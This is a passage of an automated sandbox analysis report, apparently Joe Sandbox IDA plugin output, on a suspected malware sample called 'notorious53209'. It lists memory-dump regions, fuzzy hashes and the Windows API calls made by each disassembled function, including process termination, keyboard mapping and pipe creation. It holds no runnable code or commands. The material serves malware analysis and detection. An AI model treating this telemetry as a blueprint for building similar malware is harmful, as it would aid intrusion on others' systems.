                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                            • String ID:
                                            • API String ID: 169236558-0
                                            • Opcode ID: bd44a5ea352d71f32e20666e26956dc233f101f0bed8ae9d61de5352c78fd631
                                            • Instruction ID: ff6d07a86afd254df136b8d9738b4caa59e378f4c466932e27b0d332e50f1a8c
                                            • Opcode Fuzzy Hash: bd44a5ea352d71f32e20666e26956dc233f101f0bed8ae9d61de5352c78fd631
                                            • Instruction Fuzzy Hash: DD110376522605FFDB50AF68DD08BAE77B9FF40315F504569F845D3291CB319910CB60
                                            APIs
                                              • Part of subcall function 002312F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0023134D
                                              • Part of subcall function 002312F3: SelectObject.GDI32(?,00000000), ref: 0023135C
                                              • Part of subcall function 002312F3: BeginPath.GDI32(?), ref: 00231373
                                              • Part of subcall function 002312F3: SelectObject.GDI32(?,00000000), ref: 0023139C
                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 002BC1C4
                                            • LineTo.GDI32(00000000,00000003,?), ref: 002BC1D8
                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002BC1E6
                                            • LineTo.GDI32(00000000,00000000,?), ref: 002BC1F6
                                            • EndPath.GDI32(00000000), ref: 002BC206
                                            • StrokePath.GDI32(00000000), ref: 002BC216
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                            • String ID:
                                            • API String ID: 43455801-0
                                            • Opcode ID: 3997847b02a987e659ff343f662f912366c5f3453211b12032ae3d32280dba70
                                            • Instruction ID: 655aa2c6c201414736b5ffb14ce704c600ada75295e06837b715805c396b03e1
                                            • Opcode Fuzzy Hash: 3997847b02a987e659ff343f662f912366c5f3453211b12032ae3d32280dba70
                                            • Instruction Fuzzy Hash: 9E11097640010DBFDB119F94EC88EEA7FADEB083A4F048525BE185A161C7729DA5DFA0
                                            APIs
                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 002503D3
                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 002503DB
                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002503E6
                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 002503F1
                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 002503F9
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00250401
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Virtual
                                            • String ID:
                                            • API String ID: 4278518827-0
                                            • Opcode ID: 897ad89a1cbd3ed4381c5fbbb3e731ef95a82ec10d84f25ab7198b96fd9e4ac3
                                            • Instruction ID: 999ebcddc011feb194cb7ca216537fa1e51b801438ac5bedaecc4d0aa8c4f8ca
                                            • Opcode Fuzzy Hash: 897ad89a1cbd3ed4381c5fbbb3e731ef95a82ec10d84f25ab7198b96fd9e4ac3
                                            • Instruction Fuzzy Hash: D2016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CFE5
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0029569B
                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002956B1
                                            • GetWindowThreadProcessId.USER32(?,?), ref: 002956C0
                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002956CF
                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002956D9
                                            • CloseHandle.KERNEL32(00000000), ref: 002956E0
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                            • String ID:
                                            • API String ID: 839392675-0
                                            • Opcode ID: c395d1eeab057fa8395386d776412b47b9ce4164ebda5450bbee5802eda7df60
                                            • Instruction ID: ef0beafb9a288fdb3499fef7bba705991933ed31b6c07f94aa9e666d231b0f3a
                                            • Opcode Fuzzy Hash: c395d1eeab057fa8395386d776412b47b9ce4164ebda5450bbee5802eda7df60
                                            • Instruction Fuzzy Hash: 30F06D32641158BBE7215BA6AD0DEEB7B7CEBCAB11F000269FA04D1050D6A01A0187B5
                                            APIs
                                            • InterlockedExchange.KERNEL32(?,?), ref: 002974E5
                                            • RtlEnterCriticalSection.NTDLL(?), ref: 002974F6
                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00241044,?,?), ref: 00297503
                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00297510
                                              • Part of subcall function 00296ED7: CloseHandle.KERNEL32(00000000), ref: 00296EE1
                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00297523
                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0029752A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                            • String ID:
                                            • API String ID: 3495660284-0
                                            • Opcode ID: aadbd41a2648e93d85c600f5666df318fd7fbf08333c2d87805a44310423a65a
                                            • Instruction ID: ae0661be78766c422f12d09bd030b7672cc4a2006b4fc82eb268ca383c914ed5
                                            • Opcode Fuzzy Hash: aadbd41a2648e93d85c600f5666df318fd7fbf08333c2d87805a44310423a65a
                                            • Instruction Fuzzy Hash: 99F05E3A150612EBDF921F64FE8C9EB772AEF45302B410631FA02910B4CB755C11CB50
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 002A8928
                                            • CharUpperBuffW.USER32(?,?), ref: 002A8A37
                                            • VariantClear.OLEAUT32(?), ref: 002A8BAF
                                              • Part of subcall function 00297804: VariantInit.OLEAUT32(00000000), ref: 00297844
                                              • Part of subcall function 00297804: VariantCopy.OLEAUT32(00000000,?), ref: 0029784D
                                              • Part of subcall function 00297804: VariantClear.OLEAUT32(00000000), ref: 00297859
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                            • API String ID: 4237274167-1221869570
                                            • Opcode ID: 947bddeff0d9b344e7b4362208a775814f7d986fb97168fb43b220eecfa7a772
                                            • Instruction ID: 313bd53d34cb1d59aa04099608bbf45d6b652c0a60ab90d1a76bbb7ef8564fa2
                                            • Opcode Fuzzy Hash: 947bddeff0d9b344e7b4362208a775814f7d986fb97168fb43b220eecfa7a772
                                            • Instruction Fuzzy Hash: A9916C756283029FC710DF28C48496BBBF4AF8A314F04496EF89A8B361DB70E955CB52
                                            APIs
                                              • Part of subcall function 0024FEC6: _wcscpy.LIBCMT ref: 0024FEE9
                                            • _memset.LIBCMT ref: 00293077
                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002930A6
                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00293159
                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00293187
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                            • String ID: 0
                                            • API String ID: 4152858687-4108050209
                                            • Opcode ID: 8d1b9d89bd80a5cd8ec23eba68272ca6daf47828802066b5e6bfa9b74b871b03
                                            • Instruction ID: 2984a3f6ac2d5ff7cb5f5164ad8646db68c7c5e04634242ef49da730042275f6
                                            • Opcode Fuzzy Hash: 8d1b9d89bd80a5cd8ec23eba68272ca6daf47828802066b5e6bfa9b74b871b03
                                            • Instruction Fuzzy Hash: DA51A3716383029BDB25DF28D849A6BB7E4EF55360F04092DF899D31A1DB70CE688B52
                                            APIs
                                            • _memset.LIBCMT ref: 00292CAF
                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00292CCB
                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00292D11
                                            • DeleteMenu.USER32(?,00000000,00000000), ref: 00292D5A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Menu$Delete$InfoItem_memset
                                            • String ID: 0
                                            • API String ID: 1173514356-4108050209
                                            • Opcode ID: 133f46fd73a6274f6a2165eb5d1d1f91a257e2152391f111da716e362bed62e7
                                            • Instruction ID: faf9192d7691802118af46400f9556efa675f7225ae4f1283832913a3308cd0c
                                            • Opcode Fuzzy Hash: 133f46fd73a6274f6a2165eb5d1d1f91a257e2152391f111da716e362bed62e7
                                            • Instruction Fuzzy Hash: 09419F70214302EFDB24DF24D844B5ABBE8BF85720F14462EF96597291D770E918CBA2
                                            APIs
                                              • Part of subcall function 00237F41: _memmove.LIBCMT ref: 00237F82
                                              • Part of subcall function 0028B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0028B0E7
                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002893F6
                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00289409
                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00289439
                                              • Part of subcall function 00237D2C: _memmove.LIBCMT ref: 00237D66
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSend$_memmove$ClassName
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 365058703-1403004172
                                            • Opcode ID: 1b828a02ce6b4386ad6330003d2f6d761fc02dfc1e58199118e49d7e53808132
                                            • Instruction ID: 0a5af22201c0bd45e9c1dbe02de72068d37947f0e188f4c3699f700b306e2b22
                                            • Opcode Fuzzy Hash: 1b828a02ce6b4386ad6330003d2f6d761fc02dfc1e58199118e49d7e53808132
                                            • Instruction Fuzzy Hash: 7C21E4B5921104BBDB14BB74DC858FFB7ACDF05360F144129F826972E1DB351A6A9B10
                                            APIs
                                              • Part of subcall function 00231D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00231D73
                                              • Part of subcall function 00231D35: GetStockObject.GDI32(00000011), ref: 00231D87
                                              • Part of subcall function 00231D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00231D91
                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002B66D0
                                            • LoadLibraryW.KERNEL32(?), ref: 002B66D7
                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002B66EC
                                            • DestroyWindow.USER32(?), ref: 002B66F4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                            • String ID: SysAnimate32
                                            • API String ID: 4146253029-1011021900
                                            • Opcode ID: 9dac1e4c22aa88fe078a0dabf6b0714fcdd8d3a697a4f0c646382447ef7c959f
                                            • Instruction ID: 3bc0dddaa8c37f05416054d611bf6b1f4e38f692be9ef5cb70f41f3440d2277d
                                            • Opcode Fuzzy Hash: 9dac1e4c22aa88fe078a0dabf6b0714fcdd8d3a697a4f0c646382447ef7c959f
                                            • Instruction Fuzzy Hash: 04218171120206AFEF104F64EC88EFB77ADEF593A8F104629F951D2190D779DC61AB60
                                            APIs
                                            • GetStdHandle.KERNEL32(0000000C), ref: 0029705E
                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00297091
                                            • GetStdHandle.KERNEL32(0000000C), ref: 002970A3
                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 002970DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CreateHandle$FilePipe
                                            • String ID: nul
                                            • API String ID: 4209266947-2873401336
                                            • Opcode ID: 4105ac3608efb2bf2a329f7cdc138a919488331d46f95b12dd978c84a8eb1e37
                                            • Instruction ID: 0fb1355852c024118d8691a75c0986d587d74281762caca2bcf3feb7c1dfbb79
                                            • Opcode Fuzzy Hash: 4105ac3608efb2bf2a329f7cdc138a919488331d46f95b12dd978c84a8eb1e37
                                            • Instruction Fuzzy Hash: 2921517563420AABDF209F29DC09A9A7BF8BF54720F204A19FCA1D72D0E7709C608B50
                                            APIs
                                            • GetStdHandle.KERNEL32(000000F6), ref: 0029712B
                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0029715D
                                            • GetStdHandle.KERNEL32(000000F6), ref: 0029716E
                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002971A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CreateHandle$FilePipe
                                            • String ID: nul
                                            • API String ID: 4209266947-2873401336
                                            • Opcode ID: a2f35f1cc89cf56a161faa40d04fd73b80ea1df59d98232f3739d6880e7c7dd2
                                            • Instruction ID: e5c23b629ee065f8ce7dbbb513394c8756c7fbbfe2790fbd9998c074aee9bec0
                                            • Opcode Fuzzy Hash: a2f35f1cc89cf56a161faa40d04fd73b80ea1df59d98232f3739d6880e7c7dd2
                                            • Instruction Fuzzy Hash: 60218375634206ABDF209F68DC08AAAB7E8AF55720F200B19FDA5D72D0D7709861CB50
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 0029AEBF
                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0029AF13
                                            • __swprintf.LIBCMT ref: 0029AF2C
                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,002BF910), ref: 0029AF6A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ErrorMode$InformationVolume__swprintf
                                            • String ID: %lu
                                            • API String ID: 3164766367-685833217
                                            • Opcode ID: 19974a092890413385af5811290a780fd5a4b4eb8ba2c4245388c880b25bfd59
                                            • Instruction ID: 19674bc45974513d160c3ce6320bcac602ae0b1f991efb069c6b20197b71cacb
                                            • Opcode Fuzzy Hash: 19974a092890413385af5811290a780fd5a4b4eb8ba2c4245388c880b25bfd59
                                            • Instruction Fuzzy Hash: 7E218674610209AFCB10EF54DD85EAE77B8EF49704B004069F909EB251DB71EA51CF61
                                            APIs
                                              • Part of subcall function 00237D2C: _memmove.LIBCMT ref: 00237D66
                                              • Part of subcall function 0028A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0028A399
                                              • Part of subcall function 0028A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0028A3AC
                                              • Part of subcall function 0028A37C: GetCurrentThreadId.KERNEL32(00000000), ref: 0028A3B3
                                              • Part of subcall function 0028A37C: AttachThreadInput.USER32(00000000), ref: 0028A3BA
                                            • GetFocus.USER32 ref: 0028A554
                                              • Part of subcall function 0028A3C5: GetParent.USER32(?), ref: 0028A3D3
                                            • GetClassNameW.USER32(?,?,00000100), ref: 0028A59D
                                            • EnumChildWindows.USER32(?,0028A615), ref: 0028A5C5
                                            • __swprintf.LIBCMT ref: 0028A5DF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                            • String ID: %s%d
